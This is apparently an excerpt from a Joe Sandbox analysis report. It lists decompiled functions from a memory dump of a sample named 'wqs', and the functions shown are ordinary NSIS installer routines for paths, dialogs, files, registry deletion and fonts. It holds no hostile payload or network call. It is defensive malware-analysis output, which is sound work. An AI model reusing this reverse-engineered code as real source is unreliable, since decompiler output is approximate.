Associated: 00000014.00000002.1497812165.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497856729.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497886694.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497929492.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497975486.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_wqs.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
Instruction ID: 19446832cb8519ea1938040ed984131457e28e93d0b00b9b4dc42373f0e33a15
Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
Instruction Fuzzy Hash: 382177B1500705AFCB31DF68DD08B5BBBF8AF41714B058A2EEA96B22E1C734E944CB54

Uniqueness

Uniqueness Score: -1.00%

Function 004067C4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E004067C4(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405E83(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405E39(L"*?|<>/\":", _t5))) == 0) {
							E00405FE8(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,75B53420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406827
CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406836
CharNextW.USER32(?,00000000,75B53420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040683B
CharPrevW.USER32(?,?,75B53420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040684E

Strings

*?|<>/":, xrefs: 00406816
C:\Users\user\AppData\Local\Temp\, xrefs: 004067C5

Memory Dump Source

Source File: 00000014.00000002.1497469211.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.1497430225.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497528656.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497563830.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497635882.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497724577.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497772991.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497812165.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497856729.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497886694.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497929492.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497975486.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_wqs.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-2977677972
Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
Instruction ID: 8e05d213a2b26a47bd0c986db1e6a85e10b5e067f284fb5e9645f7af11a9ce3c
Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
Instruction Fuzzy Hash: 7311862780161295DB313B158C44A77A2A8AF58798F56843FED86B32C1E77C8C9282AD

Uniqueness

Uniqueness Score: -1.00%

Function 00404E54 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404E54(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E6F
GetMessagePos.USER32 ref: 00404E77
ScreenToClient.USER32(?,?), ref: 00404E91
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EA3
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EC9

Strings

f, xrefs: 00404EA5

Memory Dump Source

Source File: 00000014.00000002.1497469211.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.1497430225.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497528656.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497563830.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497635882.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497724577.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497772991.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497812165.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497856729.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497886694.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497929492.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497975486.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_wqs.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction ID: 177f1d0b32132a6560496663958852c5fe6f1b23f9da62007dee57caca3d7f28
Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction Fuzzy Hash: 34014C71900219BADB00DBA4DD85BFFBBB8AB54711F10012BBA50B61C0D7B49A058BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00402F93 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x41ea18; // 0x52c3a
					_t11 =  *0x42aa24;
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}

0x00402fa3
0x00402fb1
0x00402fb7
0x00402fb7
0x00402fc5
0x00402fc7
0x00402fcd
0x00402fd4
0x00402fd6
0x00402fd6
0x00402fec
0x00402ffc
0x0040300e
0x0040300e
0x00403016

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
MulDiv.KERNEL32(00052C3A,00000064,?), ref: 00402FDC
wsprintfW.USER32 ref: 00402FEC
SetWindowTextW.USER32(?,?), ref: 00402FFC
SetDlgItemTextW.USER32(?,00000406,?), ref: 0040300E

Strings

verifying installer: %d%%, xrefs: 00402FE6

Memory Dump Source

Source File: 00000014.00000002.1497469211.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.1497430225.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497528656.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497563830.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497635882.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497724577.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497772991.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497812165.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497856729.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497886694.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497929492.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497975486.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_wqs.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
Instruction ID: eb17ebabde20c32bd565f0ca98bf5c3c7f8a04474e671541d9d17dad0456e96b
Opcode Fuzzy Hash: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
Instruction Fuzzy Hash: 20014B7064020DABEF209F60DE4AFEA3B79FB04345F008039FA06B51D0DBB999559F69

Uniqueness

Uniqueness Score: -1.00%

Function 00402950 Relevance: 9.1, APIs: 6, Instructions: 91
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00402950(int __ebx, void* __eflags) {
				WCHAR* _t26;
				void* _t29;
				long _t37;
				int _t49;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;
				void* _t60;
				void* _t61;

				_t49 = __ebx;
				_t52 = 0xfffffd66;
				_t26 = E00402DA6(0xfffffff0);
				_t55 = _t26;
				 *(_t61 - 0x40) = _t26;
				if(E00405E83(_t26) == 0) {
					E00402DA6(0xffffffed);
				}
				E00406008(_t55);
				_t29 = E0040602D(_t55, 0x40000000, 2);
				 *(_t61 + 8) = _t29;
				if(_t29 != 0xffffffff) {
					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
					if( *(_t61 - 0x28) != _t49) {
						_t37 =  *0x434f14;
						 *(_t61 - 0x44) = _t37;
						_t54 = GlobalAlloc(0x40, _t37);
						if(_t54 != _t49) {
							E004034E5(_t49);
							E004034CF(_t54,  *(_t61 - 0x44));
							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
							 *(_t61 - 0x10) = _t59;
							if(_t59 != _t49) {
								E004032B4( *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
								while( *_t59 != _t49) {
									_t60 = _t59 + 8;
									 *(_t61 - 0x3c) =  *_t59;
									E00405FE8( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
									_t59 = _t60 +  *(_t61 - 0x3c);
								}
								GlobalFree( *(_t61 - 0x10));
							}
							E004060DF( *(_t61 + 8), _t54,  *(_t61 - 0x44));
							GlobalFree(_t54);
							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
						}
					}
					_t52 = E004032B4( *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
					CloseHandle( *(_t61 + 8));
				}
				_t56 = 0xfffffff3;
				if(_t52 < _t49) {
					_t56 = 0xffffffef;
					DeleteFileW( *(_t61 - 0x40));
					 *((intOrPtr*)(_t61 - 4)) = 1;
				}
				_push(_t56);
				E00401423();
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t61 - 4));
				return 0;
			}

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
GlobalFree.KERNEL32(?), ref: 00402A06
GlobalFree.KERNEL32(00000000), ref: 00402A19
CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48

Memory Dump Source

Source File: 00000014.00000002.1497469211.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.1497430225.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497528656.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497563830.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497635882.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497724577.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497772991.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497812165.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497856729.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497886694.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497929492.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497975486.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_wqs.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
Instruction ID: 8fc1a79e9ee36ebd610a2d663d7387b5f1fea8f48d7bc9e01940cd119f3fb53c
Opcode Fuzzy Hash: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
Instruction Fuzzy Hash: 5831C271D00124BBCF216FA9CE49DDEBE79AF49364F14023AF450762E0CB794C429BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00405A6E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405A6E(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f8;
				_v36.Group = 0x4083f8;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e8;
				_v16.nLength = 0xc;
				if(CreateDirectoryW(_a4,  &_v16) != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}

0x00405a79
0x00405a7d
0x00405a80
0x00405a86
0x00405a8a
0x00405a8e
0x00405a96
0x00405a9d
0x00405aa3
0x00405aaa
0x00405ab9
0x00405abb
0x00000000
0x00405abb
0x00405ac5
0x00405acc
0x00405ae2
0x00000000
0x00000000
0x00000000
0x00405ae4
0x00405ae8

APIs

CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
GetLastError.KERNEL32 ref: 00405AC5
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405ADA
GetLastError.KERNEL32 ref: 00405AE4

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405A94

Memory Dump Source

Source File: 00000014.00000002.1497469211.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.1497430225.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497528656.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497563830.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497635882.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497724577.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497772991.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497812165.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497856729.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497886694.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497929492.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497975486.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_wqs.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 3449924974-3355392842
Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
Instruction ID: 637b0a295f6611997b04f2fb2f8121e2d74ae93851c1d74b8ff7b710bfe1865b
Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
Instruction Fuzzy Hash: 1A010871D04219EAEF019BA0DD84BEFBBB4EB14314F00813AD545B6281E7789648CFE9

Uniqueness

Uniqueness Score: -1.00%

Function 00402EA9 Relevance: 7.6, APIs: 5, Instructions: 84
registryCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				short _v536;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E004063AA(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v536);
						_push(0);
						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v536);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E0040690A(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyW(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}

APIs

RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74

Memory Dump Source

Source File: 00000014.00000002.1497469211.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.1497430225.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497528656.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497563830.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497635882.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497724577.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497772991.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497812165.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497856729.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497886694.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497929492.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497975486.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_wqs.jbxd

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
Instruction ID: ca6229ec891c5908b4c2d3bab14ae3db7b9396451d72a40731f1c02386a45f13
Opcode Fuzzy Hash: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
Instruction Fuzzy Hash: DA215A7150010ABBEF119F90CE89EEF7B7DEB50384F100076F909B21A0D7B49E54AA68

Uniqueness

Uniqueness Score: -1.00%

Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75
windowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00401D81(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				WCHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t60;
				long _t63;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
				} else {
					E00402D84(2);
					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
				}
				_t55 =  *(_t65 - 0x24);
				 *(_t65 + 8) = _t30;
				_t60 = _t55 & 0x00000004;
				 *(_t65 - 0x38) = _t55 & 0x00000003;
				 *(_t65 - 0x18) = _t55 >> 0x1f;
				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
				} else {
					_t38 = E00402DA6(0x11);
				}
				 *(_t65 - 0x44) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x60);
				asm("sbb esi, esi");
				_t63 = LoadImageW( ~_t60 &  *0x434f00,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
					_push(_t63);
					E00406484();
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}

APIs

GetDlgItem.USER32(?,?), ref: 00401D9A
GetClientRect.USER32(?,?), ref: 00401DE5
LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
DeleteObject.GDI32(00000000), ref: 00401E39

Memory Dump Source

Source File: 00000014.00000002.1497469211.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.1497430225.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497528656.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497563830.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497635882.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497724577.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497772991.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497812165.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497856729.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497886694.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497929492.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497975486.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_wqs.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
Instruction ID: b69f8f45c5cbb28dd5603d9b1d667d2ce3d3910c133b75fee4ecc707c572ca23
Opcode Fuzzy Hash: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
Instruction Fuzzy Hash: 3321F672904119AFCB05DBA4DE45AEEBBB5EF08314F14003AFA45F62A0DB389951DB98

Uniqueness

Uniqueness Score: -1.00%

Function 00401E4E Relevance: 7.5, APIs: 5, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00401E4E(intOrPtr __edx) {
				void* __edi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				void* _t31;
				struct HDC__* _t33;
				void* _t35;

				_t30 = __edx;
				_t33 = GetDC( *(_t35 - 8));
				_t9 = E00402D84(2);
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				0x40cdf0->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t33);
				 *0x40ce00 = E00402D84(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x20));
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				 *0x40ce07 = 1;
				 *0x40ce04 = _t15 & 0x00000001;
				 *0x40ce05 = _t15 & 0x00000002;
				 *0x40ce06 = _t15 & 0x00000004;
				E0040657A(_t9, _t31, _t33, 0x40ce0c,  *((intOrPtr*)(_t35 - 0x2c)));
				_t18 = CreateFontIndirectW(0x40cdf0);
				_push(_t18);
				_push(_t31);
				E00406484();
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

APIs

GetDC.USER32(?), ref: 00401E51
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
ReleaseDC.USER32(?,00000000), ref: 00401E84

Part of subcall function 0040657A: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nstC2CA.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nstC2CA.tmp\System.dll,00000000), ref: 00406779

CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED3

Memory Dump Source

Source File: 00000014.00000002.1497469211.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

